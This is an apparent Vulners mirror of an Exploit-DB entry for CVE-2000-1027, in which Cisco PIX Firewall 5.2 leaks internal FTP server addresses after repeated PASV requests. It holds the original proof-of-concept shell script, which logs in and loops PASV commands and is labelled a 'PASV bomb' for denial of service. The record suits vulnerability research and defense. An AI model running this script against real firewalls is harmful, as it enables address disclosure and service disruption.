Lucene search
+L

Cisco PIX Firewall 5.2 - PASV Mode FTP Internal Address Disclosure

🗓️ 03 Oct 2000 00:00:00Reported by Fabio PietrosantiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

Cisco PIX Firewall can disclose internal FTP server IP addresses in PASV mode due to requests.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2000-1027
22 Jan 200105:00
cve
cvelist
Cvelist
CVE-2000-1027
22 Jan 200105:00
cvelist
euvd
EUVD
EUVD-2000-1014
7 Oct 202500:30
euvd
nvd
NVD
CVE-2000-1027
11 Dec 200005:00
nvd
source: https://www.securityfocus.com/bid/1877/info

The Cisco PIX is a popular firewall network device.

It is possible to configure the PIX so that it hides the IP address of internal ftp servers from clients connecting to it. By sending a number of requests to enter passive ftp mode (PASV) during an ftp session, the IP address will eventually be disclosed. It is not known what exactly causes this condition.

This has been verified on versions 5.2(4) and 5.2(2) of the PIX firmware and probably affects other versions.


# sent by: Fabio Pietrosanti (naif) <[email protected]>
# try to dos pix using PASV bomb

echo "USER ftptest99"
sleep 2
echo PASS ftptest99
sleep 2
echo SYST
while true
       do

            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
            echo PASV
            sleep 1
            echo PASV
           echo PASV
            sleep 1
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03535
27